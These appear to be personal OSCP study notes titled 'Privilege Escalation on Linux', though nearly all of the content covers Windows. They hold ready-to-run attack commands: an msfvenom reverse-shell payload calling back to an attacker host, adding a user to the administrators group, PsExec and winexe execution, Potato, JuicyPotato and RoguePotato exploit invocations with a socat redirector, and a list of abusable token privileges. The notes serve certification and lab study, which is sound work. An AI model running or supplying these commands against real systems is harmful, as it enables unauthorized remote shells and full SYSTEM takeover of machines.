Privilege Escalation on Linux

OSCP Notes

1. msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe

2. Adding user to Admin group - net localgroup administrators <username> /add

3. PsExec tool - to escalate from admin user to full SYSTEM privs - (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) .\PsExec64.exe -accepteula -i -s C:\PrivEsc\revshell.exe

4. winexe command to run commands remotely

   winexe -U 'admin%<password>' //<ip address> cmd.exe

5. Hot/Rogue/Juicy/Rotten Potato attacks:

   • Potato (https://github.com/foxglovesec/Potato)

     potato.exe -ip <target ip> -cmd "C:\temp\revshell.exe" -enable_http server true -enable_defender true -enable_spoof true -enable_exhaust true

   • Juicy Potato (https://github.com/ohpe/juicy-potato) Using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account:

     > C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe Now run the JuicyPotato exploit to trigger a reverse shell running with SYSTEM privileges: (https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md)

     > C:\PrivEsc\JuicyPotato.exe -l 1337 -p C:\PrivEsc\reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

   • Rogue potato GitHub: https://github.com/antonioCoco/RoguePotato Blog: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/ Compiled Exploit: https://github.com/antonioCoco/RoguePotato/releases

     1Socat Listener - # sudo socat tcp-listen:135,reuseaddr,fork tcp:192.168.1.22:9999
     2> C:\PrivEsc\PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
     3> C:\PrivEsc\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\PrivEsc\reverse.exe"
     4     
     

6. Print spoofer exploit GitHub: https://github.com/itm4n/PrintSpoofer Blog: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

7. Understanding windows privileges (whoami \priv) Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672 https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt

   • SeTcbPrivilege - Act as part of the operating system
   • SeBackupPrivilege - Back up files and directories
   • SeCreateTokenPrivilege - Create a token object
   • SeDebugPrivilege - Debug programs
   • SeEnableDelegationPrivilege - Enable computer and user accounts to be trusted for delegation
   • SeAuditPrivilege - Generate security audits
   • SeImpersonatePrivilege - Impersonate a client after authentication
   • SeLoadDriverPrivilege - Load and unload device drivers
   • SeSecurityPrivilege - Manage auditing and security log
   • SeSystemEnvironmentPrivilege - Modify firmware environment values
   • SeAssignPrimaryTokenPrivilege - Replace a process-level token
   • SeRestorePrivilege - Restore files and directories,
   • SeTakeOwnershipPrivilege - Take ownership of files or other objects

Credits: ippsec, tib3rius,

Labs Linux/Windows PrivEsc workshop - https://github.com/sagishahar/lpeworkshop